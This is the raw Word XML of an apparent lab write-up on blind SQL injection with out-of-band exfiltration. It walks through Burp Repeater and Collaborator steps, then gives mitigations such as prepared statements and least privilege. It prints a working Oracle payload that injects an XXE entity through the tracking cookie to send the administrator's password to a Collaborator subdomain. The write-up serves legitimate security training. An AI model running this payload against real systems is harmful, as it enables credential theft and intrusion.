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1EE5E" w14:textId="10D20EBB" w:rsidR="00320924" w:rsidRDefault="004A3E86" w:rsidP="004A3E86">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47D056" w14:textId="58B251EB" w:rsidR="004A3E86" w:rsidRPr="00BA0263" w:rsidRDefault="00BA0263" w:rsidP="00BA026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application is vulnerable to a blind SQL Injection because it </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie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Pr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain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8913B7" w:rsidRPr="008913B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The database contains a different table called users, with columns called username and password</w:t>
      </w:r>
      <w:r w:rsidR="008913B7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We will try to force the server </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">to cause a DNS lookup to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="008B1E1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Suite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA0263">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator</w:t>
      </w:r>
      <w:r w:rsidR="00914A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflecting the credentials of the administrator’s account</w:t>
      </w:r>
      <w:r w:rsidR="00403572">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7B851" w14:textId="77777777" w:rsidR="004A3E86" w:rsidRDefault="004A3E86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E8AB870" w14:textId="23B9683B" w:rsidR="004A3E86" w:rsidRDefault="004A3E86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2BB11C9E" w14:textId="22CB3D7C" w:rsidR="004A3E86" w:rsidRDefault="00065992" w:rsidP="00547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Open the application and send the request for homepage to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Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653C038" w14:textId="14D28735" w:rsidR="00D25425" w:rsidRDefault="00D25425" w:rsidP="00547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Notice that even if we make any changes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25425">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tracking ID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D362BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie,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we can see no changes</w:t>
      </w:r>
      <w:r w:rsidR="00F736B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C3881E8" w14:textId="12BF8D1A" w:rsidR="00D362BE" w:rsidRDefault="00D362BE" w:rsidP="00547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Open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Collaborator Client and copy its address and using that we will craft a Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C42F2" w14:textId="1F57B1CB" w:rsidR="00F736B3" w:rsidRDefault="00D362BE" w:rsidP="00547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Now </w:t>
      </w:r>
      <w:r w:rsidR="001B13DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>append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the payload </w:t>
      </w:r>
      <w:r w:rsidR="001B13DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">after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TrackingID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token value</w:t>
      </w:r>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and when we click Poll </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB2116">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see requests made to our server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE288A" w14:textId="6745A220" w:rsidR="009577E6" w:rsidRPr="0054787A" w:rsidRDefault="003B7BAC" w:rsidP="00547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 will see a HTTP request in our Collaborator Client and the subdomain of that URL will be our administrator’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB615B" w14:textId="77777777" w:rsidR="004A3E86" w:rsidRDefault="004A3E86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53F6CB2" w14:textId="6D539F0F" w:rsidR="004A3E86" w:rsidRDefault="00912355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65D860A3" w14:textId="4B3880A8" w:rsidR="00912355" w:rsidRPr="0082645D" w:rsidRDefault="00D83BA3" w:rsidP="0082645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83BA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'+UNION+SELECT+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D83BA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXTRACTVALUE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D83BA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xmltype('&lt;%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f&gt;&lt;!DOCTYPE+root+[+&lt;!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/"&gt;+%25remote%3b]&gt;'),'/l')+FROM+dual--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92B472" w14:textId="77777777" w:rsidR="00912355" w:rsidRDefault="00912355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BC52545" w14:textId="0BE445A2" w:rsidR="00912355" w:rsidRDefault="00C769EB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p w14:paraId="6967B0D2" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prepared Statements:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always use prepared statements with parameterized queries. These ensure that the parameters (user input) passed into SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E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statements are treated in a safe manner. In Java, for example, use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than Statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F75875" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORMs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Object-Relational Mapping (ORM) frameworks. These libraries usually protect against SQL injection by avoiding the need to write SQL code directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109571F" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stored Procedures:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use stored procedures instead of direct SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E601933" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escape User Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escape all user data before it's used in a query, although this is less secure than prepared statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3AAAB" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>White List Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input validation is always a good idea, but do not rely on blacklisting specific keywords for SQLi prevention. Instead, use a whitelist approach where only specified and known good input is accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7469A" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Least Privilege Principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always connect to the database with an account that has the least privileges necessary. This way, even if there is a SQL injection vulnerability, the damage is limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C4BAE" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not reveal detailed database errors to the user. This information can be used by an attacker to refine their attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFFB7F" w14:textId="77777777" w:rsidR="0076520E" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="007652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6520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Application Firewall:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use a Web Application Firewall (WAF) that can detect and block SQLi attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36349270" w14:textId="0F584252" w:rsidR="004820C3" w:rsidRPr="0076520E" w:rsidRDefault="0076520E" w:rsidP="00F440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6520E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Database Hardening:</w:t>
      </w:r>
      <w:r w:rsidRPr="0076520E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure your database to reduce the attack surface. This includes disabling unnecessary features, removing or changing default accounts, and patching regularly.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004820C3" w:rsidRPr="0076520E" w:rsidSect="00621E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6BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96522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41C81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="061A8C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321648">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="930744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AD"/>
    <w:rsid w:val="00014DA0"/>
    <w:rsid w:val="00065992"/>
    <w:rsid w:val="001B13DC"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003B7BAC"/>
    <w:rsid w:val="00403572"/>
    <w:rsid w:val="004476B3"/>
    <w:rsid w:val="00456C15"/>
    <w:rsid w:val="004820C3"/>
    <w:rsid w:val="004A3E86"/>
    <w:rsid w:val="0054787A"/>
    <w:rsid w:val="00621ECC"/>
    <w:rsid w:val="00634346"/>
    <w:rsid w:val="00703868"/>
    <w:rsid w:val="0076520E"/>
    <w:rsid w:val="0082645D"/>
    <w:rsid w:val="008913B7"/>
    <w:rsid w:val="008B1E1D"/>
    <w:rsid w:val="00912355"/>
    <w:rsid w:val="009135AD"/>
    <w:rsid w:val="009139F6"/>
    <w:rsid w:val="00914A27"/>
    <w:rsid w:val="009577E6"/>
    <w:rsid w:val="00BA0263"/>
    <w:rsid w:val="00C769EB"/>
    <w:rsid w:val="00D20F05"/>
    <w:rsid w:val="00D25425"/>
    <w:rsid w:val="00D362BE"/>
    <w:rsid w:val="00D83BA3"/>
    <w:rsid w:val="00EC59C0"/>
    <w:rsid w:val="00F736B3"/>
    <w:rsid w:val="00FB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7259"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C9A519F-88D7-46EB-B1C8-FBD6127C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3E86"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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A3E86"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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BA0263"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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BA0263"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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47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18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T04:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T11:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>